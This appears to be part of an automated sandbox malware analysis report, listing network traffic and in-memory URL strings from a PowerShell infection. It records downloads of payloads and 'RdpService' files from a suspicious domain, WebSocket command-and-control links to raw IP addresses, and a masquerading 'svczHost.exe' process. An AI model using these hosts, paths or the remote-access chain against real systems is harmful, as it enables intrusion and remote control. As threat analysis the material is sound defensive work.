      Source: global trafficHTTP traffic detected: GET /file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437db3b2fa0fb83ecdbd3edcdfa830e9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e296229154220dabcd48c417e74866081b7c5d20c49a289c543f24eec22cbab522d3402e79738e8af51a6b4c56e1b482bb7c2375dc70d620959fecb0a13db5f7c69a828930bf4d46f7d70cd6f4f8d4a9738b8bcc2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1548c78ec9055a01bf495c56498955f53f6c825ee68079bbe4ffef478e9254d76abc75433b29236d6d4ad3a1ad4ad48435e9f0cbebbc164349fd84634f30e15af HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/54 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/11 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: pn3oXTss402VH4Y/XnVBsg==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: F96qsNnVhkO0Bnq7Mo0uCQ==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: dn0h10Qbzk6QBKAyaFvAMA==Sec-WebSocket-Version: 13
      Source: global trafficDNS traffic detected: DNS query: uyt1n8ded9fb380.com
      Source: unknownHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321187377204903035f2c6edc84e1877b6a70 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yVEgt7F7xqqbgedDhnEviGnUrgmodtXc0CqYuupY0EeXaUzosE9SZSNv%2Fi4UrUHNzIy5y7Qf0F4eEvDzv8e1uviGhV0srFqBPMoM5hMierfmpo0hAX5lnG%2FFJPvhn7lAx%2Bag9dTvNtXT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4e4aaaabdd2df-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=15965&sent=514&recv=202&lost=0&retrans=0&sent_bytes=455874&recv_bytes=24813&delivery_rate=1809810&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:31:24 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FboUqQWsCGLg%2F%2BbVaHKsjjqNhILBxcktZECUwmH62B92mZEnq622auSsV7fiVXIbaLndf5kJADcYqUgMKrAESFvhOzScoPVa9c1UcFrog1KN6cGaa4O3wGXhFa1GTZJHMHmraikmo8XY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4e4be8bab8bc8-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5804&sent=175&recv=121&lost=0&retrans=0&sent_bytes=151118&recv_bytes=15411&delivery_rate=5593869&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:31:27 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RoVttc3D9ljc6ubaTJlPcUshnB4Zr6Z9Z%2FgMMuUSoRxhoqbavXxu2cxToH27WerpWTPiRN58DyHlYb6YEi%2BiF4hYUhXWB2T3mHtnTwqL3tFj23QNKKnjPsrrpor0yxkPkr%2BQNhyw3tVh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4e50cfc3d4db5-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=26200&sent=598&recv=272&lost=0&retrans=0&sent_bytes=552761&recv_bytes=30007&delivery_rate=1514522&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:31:40 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://.css
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://.jpg
      Source: powershell.exe, 00000002.00000002.7094506346.000002BBEA236000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6985258380.00000221F3D00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7735086394.000001ECB39A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000002.00000002.7056185000.000002BBD0130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6985258380.00000221F3D00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7735086394.000001ECB393B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000006.00000002.6987209340.00000221F401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: powershell.exe, 0000000A.00000002.7753000643.000001ECB3D57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mw
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: powershell.exe, 00000002.00000002.7089746889.000002BBE23B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7089746889.000002BBE226A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6982088599.00000221EBC7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz9
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
      Source: powershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.ope
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD21F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BE9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com
      Source: svczHost.exe, 00000012.00000002.8185097351.00000199448B7000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8185097351.00000199448A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com:443/x
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz9
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
      Source: myRdpService.exeString found in binary or memory: http://www.gstatic.com/generate_204
      Source: svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECABC25000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8195035980.00007FF607651000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
      Source: myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD21F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000006.00000002.6986575195.00000221F3E20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz9
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz9
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
      Source: powershell.exe, 0000000A.00000002.7579941472.000001ECABC25000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8195035980.00007FF607651000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://github.com/dotnet/runtime
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DCA48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.7089746889.000002BBE226A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6982088599.00000221EBC7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD2B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BCF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/JxSkX6
      Source: svczHost.exe, 00000012.00000002.8185097351.00000199448A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/54
      Source: svczHost.exe, 00000012.00000002.8185097351.00000199448A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/54h
      Source: powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211873772049
